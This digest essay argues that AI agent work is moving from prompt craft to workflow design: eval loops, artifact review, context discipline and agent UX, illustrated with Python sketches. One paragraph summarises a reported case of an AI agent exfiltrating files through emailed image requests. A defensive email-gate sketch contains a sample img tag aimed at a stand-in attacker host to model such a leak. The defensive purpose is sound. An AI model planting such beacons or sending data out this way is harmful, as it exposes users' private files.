Agent Work Moves From Prompting to Workflow Control
Executive Summary
The strongest signal today is that serious AI work is being reframed as workflow design, not prompt craft. Across coding agents, office artifacts, evals, and agent UX, the common move is away from “ask the model better” and toward context discipline, visible execution, reversible actions, production-trace evaluation, and hostile verification before outputs are trusted.
What Happened
Several independent builder signals converged on the same operational lesson: capable models still fail when the surrounding system does not control context, review, and consequence.
In AI Engineer’s talk “The maturity phases of running evals”, Phil Hetzel argued that teams should stop treating evals like exhaustive unit tests. For agents, the useful starting point is observed failure: collect human judgments, preserve justifications, convert those into judge criteria, and then rerun realistic production or UAT traces offline. His most durable line was that teams should think of evals as “rerunning production,” especially once agents touch tools, external systems, and mutable state.
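As a rough illustration of the loop described above, the sketch below replays recorded inputs through the current agent and scores each output against criteria derived from reviewer justifications. Everything here is hypothetical and is not taken from the talk: the `Trace` and `Criterion` types, the `toy_agent`, and the string-matching checks, which stand in for whatever judge (often an LLM judge) a real team would use.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List


@dataclass
class Trace:
    """A recorded production or UAT interaction (hypothetical shape)."""
    trace_id: str
    user_input: str


@dataclass
class Criterion:
    """A judge criterion, kept alongside the human justification it came from."""
    name: str
    derived_from: str              # the reviewer's justification, preserved verbatim
    check: Callable[[str], bool]   # stand-in for a real judge


def rerun_traces(traces: List[Trace],
                 agent: Callable[[str], str],
                 criteria: List[Criterion]) -> Dict[str, Dict[str, bool]]:
    """Replay each recorded input through the agent and score the new output."""
    results = {}
    for trace in traces:
        output = agent(trace.user_input)
        results[trace.trace_id] = {c.name: c.check(output) for c in criteria}
    return results


def failing_traces(results: Dict[str, Dict[str, bool]]) -> List[str]:
    """Trace ids where at least one criterion failed."""
    return sorted(tid for tid, scores in results.items() if not all(scores.values()))


criteria = [
    Criterion("cites_source", "Rejected: answer gave no source.",
              lambda out: "source:" in out.lower()),
    Criterion("no_unapproved_refund", "Rejected: refund issued without approval.",
              lambda out: "refund issued" not in out.lower()),
]

traces = [
    Trace("t1", "What is our refund window?"),
    Trace("t2", "Refund order 1234 now."),
]


def toy_agent(user_input: str) -> str:
    # Deliberately flawed stand-in agent so one trace fails.
    if "refund order" in user_input.lower():
        return "Refund issued for order 1234."
    return "The refund window is 30 days. Source: policy.md"


results = rerun_traces(traces, toy_agent, criteria)
print(failing_traces(results))
```

Keeping the justification next to each criterion is a design choice in this sketch: it lets a later reviewer see why a check exists before changing or deleting it.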
Nate B Jones made the same point from a knowledge-work angle in “Your Board Deck Has a Wrong Formula. Excel Won’t Flag It.” His frame: a prompt asks for output; a workflow defines the stages the output must survive. For decks and spreadsheets, the stages are source inventory, explicit specification, constrained generation, and adversarial review. The important observation is not that AI can create Office files. It is that artifact generation is now easier than artifact trust, so the human job shifts toward owning assumptions, traceability, and review loops.
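One way to picture the adversarial-review stage is an independent recomputation against the source inventory. The sketch below assumes, purely for illustration, that every generated figure is a simple sum of named source rows; the `GeneratedCell` type, the inventory keys, and the numbers are hypothetical and do not come from the video.

```python
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class GeneratedCell:
    """A figure in a generated deck or sheet (hypothetical shape)."""
    label: str
    value: float
    source_rows: List[str]  # keys into the source inventory


def review(cells: List[GeneratedCell],
           inventory: Dict[str, float],
           tolerance: float = 0.01) -> List[str]:
    """Flag cells that cannot be traced or that disagree with a recomputation."""
    findings = []
    for cell in cells:
        missing = [key for key in cell.source_rows if key not in inventory]
        if not cell.source_rows or missing:
            findings.append(f"{cell.label}: untraceable (missing {missing})")
            continue
        # Assumption: the cell is meant to be the sum of its source rows.
        expected = sum(inventory[key] for key in cell.source_rows)
        if abs(expected - cell.value) > tolerance:
            findings.append(
                f"{cell.label}: reported {cell.value}, recomputed {expected}"
            )
    return findings


inventory = {"q1": 120.0, "q2": 135.0, "q3": 150.0}
cells = [
    GeneratedCell("H1 revenue", 255.0, ["q1", "q2"]),
    GeneratedCell("YTD revenue", 390.0, ["q1", "q2", "q3"]),  # wrong total
    GeneratedCell("Forecast", 500.0, []),                     # no provenance
]

findings = review(cells, inventory)
for finding in findings:
    print(finding)
```

The reviewer never reads the generated formula. It only checks whether the reported number can be reproduced from sources the human owns, which is the trust question rather than the generation question.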
Theo’s “How I code with AI changed a lot” added a firsthand coding-agent perspective. His current practice emphasizes harness choice, multiple short task threads, plain-language goals, project-level intent notes, steering the model’s reasoning text, examples for hard requirements, and giving agents verification tools. The notable claim was that interface and runtime now matter as much as model selection: if the environment makes threading, context inspection, remote execution, image feedback, and resumption easier, the agent becomes more useful.
Why It Matters
This is a meaningful refinement of the agent discourse. Earlier waves often asked whether agents were “smart enough.” Today’s evidence says the practical frontier is whether the surrounding workflow can make their work legible, bounded, and correctable.
That showed up directly in AI Engineer’s “What the Best Agents Share”, which described better agent products as having focus modes, transparent execution, personalization, and reversibility. The point is not simply nicer UX. Transparency turns delegation into collaboration by exposing steps, tool calls, uncertainty, and intermediate state. Reversibility bounds the cost of mistakes through rollbacks, accept/reject granularity, and review tooling.
But transparency is not a complete safety story. Simon Willison’s writeup on Microsoft Copilot Cowork exfiltrating files is the sharp counterweight: if an agent can send email without sufficient approval, and rendered mail can leak data through external image or network requests, ordinary product features become security boundaries. The lesson pairs cleanly with the UX discourse: visible execution and rollbacks help humans supervise work, but agentic systems still need hard containment around tool permissions, rendering surfaces, and data egress.
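To make "hard containment" around rendering surfaces and data egress concrete, here is a minimal sketch of a pre-send gate for agent-drafted email: it requires explicit human approval and refuses any HTML body that loads images from hosts outside an allowlist. It does not describe the reported issue's actual mechanism or any vendor's fix; the allowlist, host names, and function names are hypothetical, and a real control would also have to cover links, CSS, and other request-triggering content.

```python
from html.parser import HTMLParser
from typing import List, Set
from urllib.parse import urlparse

ALLOWED_IMAGE_HOSTS = {"assets.example.com"}  # hypothetical allowlist


class ImageSourceCollector(HTMLParser):
    """Collects the src attribute of every <img> tag in an HTML body."""

    def __init__(self) -> None:
        super().__init__()
        self.sources: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            for name, value in attrs:
                if name == "src" and value:
                    self.sources.append(value)


def blocked_image_sources(html: str,
                          allowed_hosts: Set[str] = ALLOWED_IMAGE_HOSTS) -> List[str]:
    """Return image URLs whose host is not on the allowlist."""
    collector = ImageSourceCollector()
    collector.feed(html)
    blocked = []
    for src in collector.sources:
        host = urlparse(src).hostname
        # URLs without a host (relative paths, data: URIs) are not flagged here;
        # a stricter policy might reject those as well.
        if host is not None and host not in allowed_hosts:
            blocked.append(src)
    return blocked


def may_send(html: str, approved_by_human: bool) -> bool:
    """Send only with explicit approval and no off-allowlist image loads."""
    return approved_by_human and not blocked_image_sources(html)


draft = (
    '<p>Quarterly summary attached.</p>'
    '<img src="https://assets.example.com/logo.png">'
    '<img src="https://attacker.example.net/p.png?d=secret">'
)
print(blocked_image_sources(draft))
print(may_send(draft, approved_by_human=True))
```

The gate is deliberately independent of what the agent shows the user: visible execution helps a human notice the problem, while the gate prevents the send even if nobody is watching.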
The Bigger Story
The canon developing here is less “prompt engineering is dead” than “prompting has been absorbed into a broader operating model.” Context is now treated as infrastructure. In AI Engineer’s “Stop babysitting your agents...”, Brandon Walsenuk argued that many coding-agent failures are context failures, not intelligence failures: access to docs, Slack, code, and tickets is not the same as understanding which source matters, which permissions apply, and whose norm should win.
That organizational layer also appeared in Nate B Jones’s discussion of Shopify’s internal agent River, “Shopify CEO Reveals Their Secret AI Developer”. The most interesting claim was not the volume of AI-generated PRs; it was the decision to keep agent work visible in public team channels. If AI work happens only in private chats, individuals get faster while the organization fails to learn. Public, non-sensitive agent work creates shared examples of task framing, correction, review, and reusable practice.
There was one adjacent infrastructure thread worth preserving: Alex Cheema’s “Frontier AI at Home” framed local inference as a stack problem involving memory bandwidth, decode performance, quantization, kernels, orchestration, energy, and heterogeneous hardware. It fits the same broader shift: trust in AI systems is increasingly shaped by the whole operating environment, not just the model.
Workflow Implications
For operators, the takeaway is concrete: stop evaluating AI adoption by output volume alone. Ask whether each workflow has context ownership, observable execution, reversible actions, trace capture, failure-mode review, and a second-pass verifier. If the artifact cannot explain where its claims, formulas, or code changes came from, it is not finished; it is only generated.
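The checklist above could be tracked per workflow with something as small as the following sketch. The field names simply mirror the six questions in the paragraph; the `WorkflowControls` type and the "generated only" and "reviewable" labels are illustrative assumptions, not an established standard.

```python
from dataclasses import dataclass, fields
from typing import List


@dataclass
class WorkflowControls:
    """One flag per control named in the checklist (hypothetical structure)."""
    context_ownership: bool = False
    observable_execution: bool = False
    reversible_actions: bool = False
    trace_capture: bool = False
    failure_mode_review: bool = False
    second_pass_verifier: bool = False


def missing_controls(controls: WorkflowControls) -> List[str]:
    """Names of controls the workflow does not yet have, in declaration order."""
    return [f.name for f in fields(controls) if not getattr(controls, f.name)]


def readiness(controls: WorkflowControls) -> str:
    """'reviewable' only when every control is present, else 'generated only'."""
    return "reviewable" if not missing_controls(controls) else "generated only"


board_deck = WorkflowControls(
    context_ownership=True,
    observable_execution=True,
    trace_capture=True,
)
print(readiness(board_deck))
print(missing_controls(board_deck))
```

Reporting the missing controls by name, rather than a single score, keeps the audit tied to the specific gap an operator needs to close.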
Further Reading
- Jack Clark, Import AI 458: Reckoning with the future and a singularity story — worth saving as a long-horizon companion piece, though today’s evidence supported the practical agent-workflow thread more strongly.
- Ethan Mollick, Choosing to Stay Human — relevant to the parallel authenticity discussion around AI-mediated human communication.


